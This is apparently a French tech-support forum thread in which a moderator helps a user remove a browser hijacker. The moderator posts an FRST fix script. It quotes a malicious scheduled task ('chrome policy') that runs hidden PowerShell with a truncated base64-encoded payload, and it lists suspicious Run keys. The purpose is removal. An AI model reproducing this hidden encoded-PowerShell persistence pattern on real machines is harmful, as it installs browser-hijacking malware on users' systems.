Sujet Précédent Sujet Suivant

Probleme virus windows powershell

Résolu/Fermé
cailloux - Modifié le 14 déc. 2022 à 00:05
bazfile Messages postés 56639 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 17 décembre 2024 - 14 déc. 2022 à 17:24

Bonjour,

depuis quelques mois powershell s'ouvre et 1-2 heure après mon navigateur (chrome et/ou opera gx si ils sont ouvert) redémarre et redige les page de recherche gooogle sur des pages bing ou yahoo.

j'ai déja fait l'analyse frst donc je vous les joint.

fsrt: https://www.cjoint.com/c/LLnw7pm6qTw 

addition: https://www.cjoint.com/c/LLnxbqhVz6w 

je vous remercie d'avance pour votre aide.


Windows / Opera 93.0.0.0

A voir également:

1 réponse

Réponse 1 / 1
bazfile Messages postés 56639 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 17 décembre 2024 19 326
14 déc. 2022 à 00:15

Bonjour.

Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :

 
Start::
CreateRestorePoint:
CloseProcesses:
Task: {720A2725-4382-48D8-B4D7-CC7A5BD88AF8} - System32\Tasks\chrome policy => cmd /c powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADQATQBUAEkANQBOAG (l'élément de données a 5523 caractères en plus).
HKU\S-1-5-21-1220070019-212098726-2094985667-1001\...\Run: [AMDNoiseSuppression] => "C:\Windows\system32\AMD\ANR\AMDNoiseSuppression.exe" (Pas de fichier)
HKU\S-1-5-21-1220070019-212098726-2094985667-1001\...\Run: [Entertainment] => C:\Users\lecai\AppData\Roaming\Entertainment\Entertainment.exe --RLrS8 (Pas de fichier)
S2 Macro Expert; d:\mouse recorder\MacroService.exe [X]
S3 equ8_helper; \??\C:\Windows\system32\DRIVERS\equ8_helper.sys [X]
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>  -> Pas de fichier
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [4668]
FirewallRules: [TCP Query User{1B8B5243-C368-4E86-86E1-D87044AFF81C}D:\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) D:\epic games\launcher\engine\binaries\win64\epicwebhelper.exe => Pas de fichier
FirewallRules: [UDP Query User{1B43D8BD-8CF9-4366-91FC-AC8506CD174C}D:\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) D:\epic games\launcher\engine\binaries\win64\epicwebhelper.exe => Pas de fichier
FirewallRules: [TCP Query User{87D9D870-1212-41E2-8002-A3552208E9C2}D:\tert\deeeer simulator\deeeer simulator.exe] => (Allow) D:\tert\deeeer simulator\deeeer simulator.exe => Pas de fichier
FirewallRules: [UDP Query User{D1D58B65-EC11-4B99-BC37-BA8DC2F853B5}D:\tert\deeeer simulator\deeeer simulator.exe] => (Allow) D:\tert\deeeer simulator\deeeer simulator.exe => Pas de fichier
FirewallRules: [TCP Query User{3CA15523-0D72-4855-AB29-F7CA628E1326}D:\xbox\death's door win10\content\deathsdoor.exe] => (Allow) D:\xbox\death's door win10\content\deathsdoor.exe => Pas de fichier
HKU\S-1-5-21-1220070019-212098726-2094985667-1001\...\Run: [streamlink-twitch-gui] => C:\Users\lecai\AppData\Roaming\streamlink-twitch-gui\streamlink-twitch-gui.exe [2081280 2022-07-26] (The NW.js Community) [Fichier non signé]
FirewallRules: [UDP Query User{F21AE6CF-CCA1-43A5-B671-18324FF47A75}D:\xbox\death's door win10\content\deathsdoor.exe] => (Allow) D:\xbox\death's door win10\content\deathsdoor.exe => Pas de fichier
FirewallRules: [TCP Query User{1E1BA013-6C58-46EE-B196-F8F76FDAC4B2}C:\program files\epic games\justdiealready\jdgame\binaries\win64\jdgame-win64-shipping.exe] => (Allow) C:\program files\epic games\justdiealready\jdgame\binaries\win64\jdgame-win64-shipping.exe => Pas de fichier
FirewallRules: [UDP Query User{1164FDF7-5A6A-4FCF-9152-01D8DEA8E444}C:\program files\epic games\justdiealready\jdgame\binaries\win64\jdgame-win64-shipping.exe] => (Allow) C:\program files\epic games\justdiealready\jdgame\binaries\win64\jdgame-win64-shipping.exe => Pas de fichier
FirewallRules: [TCP Query User{AB57D401-9C38-4B44-B9E0-704E34BC9760}D:\xbox\spiderheck\content\spiderheck.exe] => (Allow) D:\xbox\spiderheck\content\spiderheck.exe => Pas de fichier
FirewallRules: [UDP Query User{C9BAA017-7FF2-4651-BA7F-6B6112467425}D:\xbox\spiderheck\content\spiderheck.exe] => (Allow) D:\xbox\spiderheck\content\spiderheck.exe => Pas de fichier
FirewallRules: [{3D68B025-4DC9-4483-93EA-01A2EA2DB098}] => (Allow) C:\Program Files (x86)\Overwolf\0.208.1.4\OverwolfBrowser.exe => Pas de fichier
FirewallRules: [{E515BEC1-4932-4821-9938-F1170DAB5309}] => (Allow) C:\Program Files (x86)\Overwolf\0.208.1.4\OverwolfBrowser.exe => Pas de fichier
FirewallRules: [{5042F416-F80B-4F56-8A62-9B261F2A1AF7}] => (Block) C:\Program Files (x86)\Overwolf\0.208.1.4\OverwolfBrowser.exe => Pas de fichier
FirewallRules: [{9C75C24E-46D2-4504-95A2-3A870AA15060}] => (Block) C:\Program Files (x86)\Overwolf\0.208.1.4\OverwolfBrowser.exe => Pas de fichier
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
 


Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ce rapport fixlog sur PJJOINT puis donne le lien généré par PJJOINT dans ta réponse.

5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT

Pour information.

Ta version de Windows 10 n'est pas à jour, pour le vérifier va dans Windows Update la mise à jour vers la version 22H2 doit t'y être proposée si ce n'est pas le cas va sur cette page clique sur Mettre à jour maintenant, cela lancera le téléchargement de l'outil de Microsoft, il suffira de l'ouvrir et il te permettra de mettre à jour Windows 10 vers la dernière version et te dira si elle est compatible avec ton pc, attention cette mise à jour dure un certain temps.
0
cailloux
Modifié le 14 déc. 2022 à 11:38

merci beaucoup pour le script, je te joins le fixlog et je renvoi une réponse demain pour sacoir si mon probleme est toujours présent

https://www.cjoint.com/c/LLoa4a2Wgaw  

0
cailloux
14 déc. 2022 à 02:00

et merci aussi pour la maj windows

0
bazfile Messages postés 56639 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 17 décembre 2024 19 326 > cailloux
14 déc. 2022 à 11:39

Le fixlog est OK.


Si de ton côté tout est également OK, tu peux désinstaller FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.

0
cailloux > bazfile Messages postés 56639 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 17 décembre 2024
14 déc. 2022 à 16:06

du coup tout est ok, je te remercie pour aide.

0
bazfile Messages postés 56639 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 17 décembre 2024 19 326 > cailloux
14 déc. 2022 à 17:24

De rien.

@+ sur CCM.

0